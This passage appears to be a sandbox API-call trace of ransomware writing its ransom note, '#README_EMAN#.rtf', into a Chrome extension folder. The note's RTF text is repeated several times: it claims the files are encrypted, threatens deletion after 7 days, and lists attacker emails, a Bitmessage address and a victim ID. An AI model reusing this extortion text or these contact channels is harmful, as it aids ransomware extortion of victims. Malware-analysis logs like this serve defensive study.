b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.338] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.339] CloseHandle (hObject=0x294) returned 1 [0273.339] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0273.339] GetLastError () returned 0x2 [0273.339] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 